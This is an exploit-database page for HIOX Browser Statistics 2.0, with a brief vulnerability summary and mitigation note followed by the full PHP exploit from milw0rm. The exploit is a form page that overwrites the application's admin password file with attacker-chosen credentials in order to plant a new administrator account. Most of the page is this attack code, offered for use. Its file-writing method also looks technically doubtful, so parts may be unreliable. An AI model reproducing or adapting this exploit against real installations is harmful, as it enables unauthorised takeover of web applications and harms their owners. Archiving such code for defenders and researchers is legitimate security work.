header-logo
Suggest Exploit
vendor:
HIOX Browser Statistics
by:
Stack
7.5
CVSS
HIGH
Arbitrary Add Admin User Vulnerability
264
CWE
Product Name: HIOX Browser Statistics
Affected Version From: 2
Affected Version To: 2
Patch Exists: Yes
Related CWE: N/A
CPE: a:hscripts:hiox_browser_statistics
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability

HIOX Browser Statistics 2.0 is vulnerable to an arbitrary add admin user vulnerability. An attacker can exploit this vulnerability to add an admin user to the application. This vulnerability is due to the application not properly validating user-supplied input. An attacker can exploit this vulnerability by sending a crafted HTTP request to the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the application.
Source

Exploit-DB raw data:

<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability  
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
 [~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
    $usname = $_POST['usernam'];
    $passwrd = md5($_POST['pword']);
    if($usname != "" && $passwrd != ""){
 $filee = "http://localhost/path/admin/passwo.php";
 $file1 = file($filee);
        $file = fopen($filee,'w');
        fwrite($file, "<?php \n");
        fwrite($file, "$");
        fwrite($file, "user=\"$usname\";\n");
        fwrite($file, "$");
        fwrite($file, "pass=\"$passwrd\";");
        fwrite($file, "\n?>");
        fclose($file);
    $creat = "false"; 
    echo "<div align=center style='color: green;'><b>New User Created
  <meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
  <br>Please Wait You will be Redirected to Login Page
   </div>";
    }
    else{
        echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
    }
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
 Create New User </td></tr>
     <tr width=400 height=20><td>
        <form name=setf method=POST action=<?php echo $PHP_SELF;?>>
        <table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
        <tr><td>User Name</td><td><input class="ta" name="usernam"  type=text maxlength=20 >
                </td></tr>
        <tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
        <input name="createe" type=hidden value="creatuser"></td></tr>
        <tr><td></td><td><input type=submit value="create"></td></tr>
        </table>
 </form>
</td></tr></table>
<?php
}
}else{
 echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>

# milw0rm.com [2008-07-30]

Navigation

Suggest Exploit

Services By CQR